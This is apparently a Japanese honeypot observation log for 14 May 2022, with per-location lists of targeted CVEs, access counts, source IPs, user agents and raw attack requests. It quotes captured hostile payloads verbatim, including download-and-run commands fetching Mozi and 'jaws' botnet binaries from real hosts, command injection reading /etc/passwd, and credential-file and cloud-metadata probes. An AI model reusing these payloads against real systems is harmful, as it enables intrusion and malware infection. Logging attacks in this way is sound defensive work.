ハニーポット(仮) 観測記録 2022/05/14分です。
特徴
共通
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
zgrabによるスキャン行為
/.envへのスキャン行為
Location:JP
Drupalの脆弱性(CVE-2018-7600)を狙うアクセス
Dynamicwebの脆弱性(CVE-2022-25369)を狙うアクセス
Oracle WebLogicの脆弱性(CVE-2020-14882,CVE-2020-14883,CVE-2020-14750)を狙うアクセス
TerraMaster TOSの脆弱性(CVE-2020-15568)を狙うアクセス
WordPress Pluginの脆弱性を狙うアクセス
クラウド環境のメタデータ情報を狙うアクセス
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget jx.qingdaosheng.com/jaws; sh /tmp/jaws
Location:US
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Apache Solrへのスキャン行為
Laravelへのスキャン行為
WordPressへのスキャン行為
を確認しました。
Location:UK
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
curlによるスキャン行為
.cssへのスキャン行為
/.gitへのスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
Laravelへのスキャン行為
を確認しました。
Location:SG
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
aiohttpによるスキャン行為
/.awsへのスキャン行為
/.gitへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
Gh0stRATのような動き
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http://27.194.190.11:55210/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
cd /tmp; rm -rf *; wget jx.qingdaosheng.com/jaws; sh /tmp/jaws
cd /tmp; rm -rf *; wget v1.kannimanelaji.com/jaws; sh /tmp/jaws
他
アクセス数推移
JP:総アクセス数:119 (前日比:-94)
US:総アクセス数:133 (前日比:53)
UK:総アクセス数:64 (前日比:21)
SG:総アクセス数:161 (前日比:95)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
16 | 3.239.96.225 | United States |
40 | 18.216.220.138 | United States |
3 | 40.82.192.115 | United States |
1 | 40.86.114.221 | United States |
2 | 45.9.20.101 | Russia |
14 | 95.214.235.205 | Ukraine |
1 | 104.244.74.253 | United States |
2 | 109.237.103.123 | Russia |
7 | 135.125.217.54 | France |
5 | 135.125.244.48 | France |
1 | 137.184.113.41 | United States |
1 | 137.184.126.182 | United States |
2 | 142.93.194.204 | United States |
1 | 156.215.119.63 | Egypt |
1 | 163.172.88.201 | United Kingdom |
1 | 172.104.138.223 | United States |
1 | 183.136.225.9 | China |
4 | 185.165.190.34 | Seychelles |
1 | 185.180.143.7 | Portugal |
1 | 185.220.100.253 | Germany |
8 | 185.254.196.217 | Ukraine |
1 | 192.241.212.227 | United States |
1 | 192.241.220.166 | United States |
1 | 192.241.220.188 | United States |
1 | 198.235.24.149 | United States |
1 | 198.244.142.77 | France |
1 | 205.210.31.128 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
7 | - |
1 | Hello, world |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 |
2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36 |
2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 |
40 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0 |
2 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE |
2 | Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 |
43 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
2 | Mozilla/5.0 zgrab/0.x |
1 | python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.62.1.el7.x86_64 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | MGLNDD_18.179.20.5_80\n |
||
1 | \x16\x03\x01\x01D\x01 |
||
2 | \x16\x03\x01 |
||
42 | GET | /.env |
HTTP/1.1 |
1 | GET | /.well-known/security.txt |
HTTP/1.1 |
1 | GET | ///.env |
HTTP/1.1 |
1 | GET | /?id=nuclei%25{128*128} |
HTTP/1.1 |
1 | GET | /Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername=JCqBGq&adminpassword=Qjv3Wi&adminemail=test@test.com&adminname=test |
HTTP/1.1 |
1 | GET | /InsightPluginShowGeneralConfiguration.jspa; |
HTTP/1.1 |
1 | GET | /ReportServer |
HTTP/1.1 |
1 | GET | /_profiler/phpinfo |
HTTP/1.1 |
1 | GET | /admin/.env |
HTTP/1.1 |
1 | GET | /aj.html?a=devi |
HTTP/1.1 |
1 | GET | /api/.env |
HTTP/1.1 |
1 | GET | /app/.env |
HTTP/1.1 |
1 | GET | /application/.env |
HTTP/1.1 |
1 | GET | /apps/.env |
HTTP/1.1 |
1 | GET | /auth/.env |
HTTP/1.1 |
1 | GET | /back/.env |
HTTP/1.1 |
1 | GET | /backend/.env |
HTTP/1.1 |
1 | GET | /cli/.env |
HTTP/1.1 |
1 | GET | /config/.env |
HTTP/1.1 |
1 | GET | /console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http[:]//c9tl1qg45cabor000010k9c9t39j8iagj[.]oast[.]live') |
HTTP/1.1 |
1 | GET | /core/.env |
HTTP/1.1 |
1 | GET | /cp/.env |
HTTP/1.1 |
1 | GET | /dependencies/.env |
HTTP/1.1 |
1 | GET | /deployment/.env |
HTTP/1.1 |
1 | GET | /dev/.env |
HTTP/1.1 |
1 | GET | /development/.env |
HTTP/1.1 |
1 | GET | /docker/.env |
HTTP/1.1 |
1 | GET | /document/.env |
HTTP/1.1 |
1 | GET | /engine/.env |
HTTP/1.1 |
3 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /framework/.env |
HTTP/1.1 |
1 | GET | /frontend/.env |
HTTP/1.1 |
1 | GET | /fuN3 |
HTTP/1.0 |
1 | GET | /hudson |
HTTP/1.1 |
1 | GET | /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Enuclei.txt |
HTTP/1.1 |
1 | GET | /include/nuclei.txt |
HTTP/1.1 |
1 | GET | /laravel-artisa/.env |
HTTP/1.1 |
1 | GET | /laravel/.env |
HTTP/1.1 |
1 | GET | /local/.env |
HTTP/1.1 |
1 | GET | /login/.env |
HTTP/1.1 |
1 | GET | /master/.env |
HTTP/1.1 |
1 | GET | /personal/.env |
HTTP/1.1 |
1 | GET | /private/.env |
HTTP/1.1 |
1 | GET | /project/.env |
HTTP/1.1 |
1 | GET | /protected/.env |
HTTP/1.1 |
1 | GET | /reports/rwservlet/showenv |
HTTP/1.1 |
1 | GET | /reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:/// |
HTTP/1.1 |
1 | GET | /rest/.env |
HTTP/1.1 |
1 | GET | /robots.txt |
HTTP/1.1 |
1 | GET | /search/.env |
HTTP/1.1 |
1 | GET | /server/.env |
HTTP/1.1 |
1 | GET | /shared/.env |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+jx[.]qingdaosheng[.]com/jaws;sh+/tmp/jaws |
HTTP/1.1 |
1 | GET | /showLogin.cc |
HTTP/1.1 |
1 | GET | /site/.env |
HTTP/1.1 |
1 | GET | /sitemap.xml |
HTTP/1.1 |
1 | GET | /src/.env |
HTTP/1.1 |
1 | GET | /system/.env |
HTTP/1.1 |
1 | GET | /v1/290T4KmjX075WL6GGBqlVJfM3dk.php |
HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | GET | /vod_installer/.env |
HTTP/1.1 |
1 | GET | /vue/.env |
HTTP/1.1 |
1 | GET | /web/.env |
HTTP/1.1 |
1 | GET | /yuuki?pp=env |
HTTP/1.1 |
1 | GET | http[:]//169[.]254[.]169[.]254/latest/meta-data/ |
HTTP/1.1 |
1 | POST | /api.php |
HTTP/1.1 |
1 | POST | /rest/tinymce/1/macro/preview |
HTTP/1.1 |
1 | POST | /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax |
HTTP/1.1 |
1 | POST | /v1/backend1 |
HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | POST | /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php |
HTTP/1.1 |
1 | POST | /wsman |
HTTP/1.1 |
Location:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
40 | 3.93.10.142 | United States |
1 | 20.22.223.132 | United States |
15 | 20.41.113.162 | United States |
4 | 27.124.5.121 | Singapore |
1 | 42.238.186.34 | China |
17 | 45.9.20.101 | Russia |
1 | 46.249.33.53 | Netherlands |
9 | 51.79.29.48 | Canada |
1 | 52.173.31.82 | United States |
13 | 103.153.78.29 | Vietnam |
2 | 109.237.103.123 | Russia |
1 | 137.184.113.41 | United States |
1 | 137.184.122.128 | United States |
2 | 157.245.70.127 | United States |
1 | 162.142.125.210 | United States |
1 | 162.142.125.222 | United States |
1 | 163.172.88.201 | United Kingdom |
1 | 165.22.151.166 | United States |
1 | 178.72.78.35 | Russia |
1 | 185.180.143.137 | Portugal |
1 | 185.220.101.34 | Germany |
9 | 185.254.196.223 | Ukraine |
1 | 192.241.206.21 | United States |
1 | 192.241.212.140 | United States |
1 | 192.241.220.48 | United States |
1 | 192.241.221.9 | United States |
1 | 193.56.252.222 | Romania |
1 | 198.235.24.3 | United States |
1 | 198.235.24.130 | United States |
1 | 206.189.224.36 | United States |
1 | 209.127.181.88 | Canada |
UserAgent一覧
件数 | UserAgent |
---|---|
11 | - |
3 | Go-http-client/1.1 |
3 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36 |
32 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
13 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 |
40 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0 |
23 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
3 | Mozilla/5.0 zgrab/0.x |
1 | python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.62.1.el7.x86_64 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | MGLNDD_34.68.118.83_80\n |
||
1 | \x16\x03\x01\x01D\x01 |
||
3 | \x16\x03\x01 |
||
26 | GET | /.env |
HTTP/1.1 |
1 | GET | ///.env |
HTTP/1.1 |
1 | GET | /2018/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
1 | GET | /2019/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
2 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
2 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
1 | GET | /ab2g |
HTTP/1.1 |
1 | GET | /ab2h |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /actuator/health |
HTTP/1.1 |
1 | GET | /admin/.env |
HTTP/1.1 |
1 | GET | /api/.env |
HTTP/1.1 |
1 | GET | /app/.env |
HTTP/1.1 |
1 | GET | /application/.env |
HTTP/1.1 |
1 | GET | /apps/.env |
HTTP/1.1 |
1 | GET | /auth/.env |
HTTP/1.1 |
1 | GET | /back/.env |
HTTP/1.1 |
1 | GET | /backend/.env |
HTTP/1.1 |
1 | GET | /cli/.env |
HTTP/1.1 |
2 | GET | /cms/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
1 | GET | /config/.env |
HTTP/1.1 |
1 | GET | /console/ |
HTTP/1.1 |
1 | GET | /core/.env |
HTTP/1.1 |
1 | GET | /cp/.env |
HTTP/1.1 |
1 | GET | /dependencies/.env |
HTTP/1.1 |
1 | GET | /deployment/.env |
HTTP/1.1 |
1 | GET | /dev/.env |
HTTP/1.1 |
1 | GET | /development/.env |
HTTP/1.1 |
1 | GET | /docker/.env |
HTTP/1.1 |
1 | GET | /document/.env |
HTTP/1.1 |
1 | GET | /engine/.env |
HTTP/1.1 |
2 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /framework/.env |
HTTP/1.1 |
1 | GET | /frontend/.env |
HTTP/1.1 |
1 | GET | /hudson |
HTTP/1.1 |
2 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
1 | GET | /laravel-artisa/.env |
HTTP/1.1 |
1 | GET | /laravel/.env |
HTTP/1.1 |
1 | GET | /local/.env |
HTTP/1.1 |
1 | GET | /login/.env |
HTTP/1.1 |
1 | GET | /master/.env |
HTTP/1.1 |
1 | GET | /media/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
2 | GET | /news/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
1 | GET | /personal/.env |
HTTP/1.1 |
1 | GET | /portal/redlion |
HTTP/1.1 |
1 | GET | /private/.env |
HTTP/1.1 |
1 | GET | /project/.env |
HTTP/1.1 |
1 | GET | /protected/.env |
HTTP/1.1 |
1 | GET | /rest/.env |
HTTP/1.1 |
1 | GET | /robots.txt |
HTTP/1.1 |
1 | GET | /search/.env |
HTTP/1.1 |
1 | GET | /server/.env |
HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
HTTP/1.0 |
1 | GET | /shared/.env |
HTTP/1.1 |
1 | GET | /shop/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
1 | GET | /showLogin.cc |
HTTP/1.1 |
1 | GET | /site/.env |
HTTP/1.1 |
1 | GET | /site/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
1 | GET | /sitemap.xml |
HTTP/1.1 |
1 | GET | /sito/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
2 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
1 | GET | /src/.env |
HTTP/1.1 |
1 | GET | /system/.env |
HTTP/1.1 |
2 | GET | /test/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
2 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | GET | /vod_installer/.env |
HTTP/1.1 |
1 | GET | /vue/.env |
HTTP/1.1 |
1 | GET | /web/.env |
HTTP/1.1 |
2 | GET | /web/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
2 | GET | /website/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
2 | GET | /wordpress/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
2 | GET | /wp-includes/wlwmanifest.xml |
HTTP/1.1 |
2 | GET | /wp/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
2 | GET | /wp1/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
2 | GET | /wp2/wp-includes/wlwmanifest.xml |
HTTP/1.1 |
2 | GET | /xmlrpc.php?rsd |
HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
1 | POST | /HNAP1/ |
HTTP/1.0 |
1 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
1 | POST | /mgmt/tm/util/bash |
HTTP/1.1 |
2 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | PRI | * |
HTTP/2.0 |
Location:UK
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
8 | 5.8.10.202 | Russia |
2 | 20.239.173.152 | United States |
4 | 23.224.186.23 | United States |
1 | 27.45.125.147 | China |
12 | 45.9.20.101 | Russia |
1 | 46.249.33.53 | Netherlands |
1 | 80.82.70.228 | United Kingdom |
1 | 80.246.81.12 | Russia |
2 | 109.237.103.123 | Russia |
4 | 128.14.134.170 | United States |
2 | 157.230.216.203 | United States |
1 | 162.142.125.10 | United States |
1 | 163.172.88.201 | United Kingdom |
1 | 167.94.138.119 | United States |
1 | 167.248.133.47 | United States |
16 | 172.104.159.48 | United States |
1 | 179.189.124.70 | Brazil |
1 | 192.241.214.35 | United States |
1 | 192.241.220.119 | United States |
1 | 192.241.222.154 | United States |
1 | 193.124.7.9 | Czechia |
1 | 198.235.24.19 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
25 | - |
4 | Go-http-client/1.1 |
4 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
4 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
12 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 |
1 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
1 | Mozilla/5.0 Gecko/20100101 |
2 | Mozilla/5.0 zgrab/0.x |
8 | curl/7.54.0 |
1 | python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.62.1.el7.x86_64 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | MGLNDD_132.145.66.34_80\n |
||
1 | \x16\x03\x01\x01D\x01 |
||
7 | \x16\x03\x01\x02 |
||
6 | \x16\x03\x01 |
||
1 | \x16\x03\x02\x01o\x01 |
||
1 | GET | /.env |
HTTP/1.1 |
1 | GET | /.git/HEAD |
HTTP/1.1 |
1 | GET | ///.env |
HTTP/1.1 |
1 | GET | /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 |
HTTP/1.1 |
1 | GET | /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
1 | GET | /CSS/Miniweb.css |
HTTP/1.1 |
1 | GET | /Portal/Portal.mwsl |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
2 | GET | /aaa9 |
HTTP/1.1 |
2 | GET | /aab9 |
HTTP/1.1 |
1 | GET | /ab2g |
HTTP/1.1 |
1 | GET | /ab2h |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /console/ |
HTTP/1.1 |
1 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /ghksjdghdfksanitycheckqwerjlhfgjksdghlid |
HTTP/1.1 |
1 | GET | /hudson |
HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
1 | GET | /manager/html |
HTTP/1.1 |
1 | GET | /nmaplowercheck1652409799 |
HTTP/1.1 |
1 | GET | /portal/redlion |
HTTP/1.1 |
1 | GET | /robots.txt |
HTTP/1.1 |
1 | GET | /sitemap.xml |
HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | GET | http[:]//example[.]com/ |
HTTP/1.1 |
1 | HEAD | / |
HTTP/1.1 |
1 | HEAD | /icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png |
HTTP/1.1 |
1 | HEAD | /icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png |
HTTP/1.1 |
1 | HEAD | /icons/.%2e/%2e%2e/apache2/icons/sphere1.png |
HTTP/1.1 |
1 | HEAD | /icons/sphere1.png |
HTTP/1.1 |
2 | HEAD | /robots.txt |
HTTP/1.0 |
1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
2 | POST | /HNAP1/ |
HTTP/1.0 |
1 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
1 | POST | /functionRouter |
HTTP/1.1 |
2 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
3 | PRI | * |
HTTP/2.0 |
Location:SG
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 20.109.91.16 | United States |
1 | 20.114.190.119 | United States |
1 | 27.194.190.11 | China |
1 | 40.86.121.220 | United States |
40 | 44.203.138.23 | United States |
13 | 45.9.20.101 | Russia |
2 | 45.35.105.132 | United States |
1 | 45.143.203.111 | Russia |
9 | 51.79.29.48 | Canada |
1 | 51.222.194.232 | Canada |
7 | 52.58.74.10 | United States |
1 | 66.240.205.34 | United States |
1 | 92.38.133.82 | Luxembourg |
2 | 94.232.41.27 | Russia |
2 | 109.237.103.123 | Russia |
1 | 112.242.151.81 | China |
13 | 128.199.2.117 | United Kingdom |
1 | 142.93.194.204 | United States |
33 | 152.69.187.96 | United States |
2 | 157.230.216.203 | United States |
1 | 162.142.125.8 | United States |
1 | 162.142.125.10 | United States |
1 | 163.172.88.201 | United Kingdom |
1 | 185.180.143.7 | Portugal |
8 | 185.254.196.223 | Ukraine |
1 | 192.241.213.226 | United States |
1 | 192.241.219.103 | United States |
1 | 192.241.220.120 | United States |
1 | 192.241.220.228 | United States |
1 | 192.241.221.243 | United States |
4 | 193.118.53.202 | United States |
2 | 194.28.112.140 | Moldova |
1 | 197.41.71.39 | Egypt |
1 | 198.98.54.163 | United States |
1 | 198.235.24.29 | United States |
1 | 205.210.31.136 | United States |
1 | 221.148.17.8 | South Korea |
UserAgent一覧
件数 | UserAgent |
---|---|
17 | - |
3 | Hello, world |
5 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2171.95 Safari/537.36 |
13 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36 |
5 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
13 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
40 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0 |
32 | Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
22 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
4 | Mozilla/5.0 zgrab/0.x |
2 | Python/3.7 aiohttp/3.7.4.post0 |
1 | python-requests/2.27.1 |
1 | python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.62.1.el7.x86_64 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | Gh0st\xad |
||
1 | MGLNDD_13.67.44.234_80 |
||
5 | \x03 |
||
1 | \x16\x03\x01\x01D\x01 |
||
3 | \x16\x03\x01 |
||
1 | \x16\x03\x03 |
||
1 | GET | /.aws/credentials |
HTTP/1.1 |
1 | GET | /.env.bak |
HTTP/1.1 |
1 | GET | /.env.dev |
HTTP/1.1 |
1 | GET | /.env.dist |
HTTP/1.1 |
1 | GET | /.env.local |
HTTP/1.1 |
26 | GET | /.env |
HTTP/1.1 |
1 | GET | /.git/config |
HTTP/1.1 |
1 | GET | ///.env |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
1 | GET | /ReportServer |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
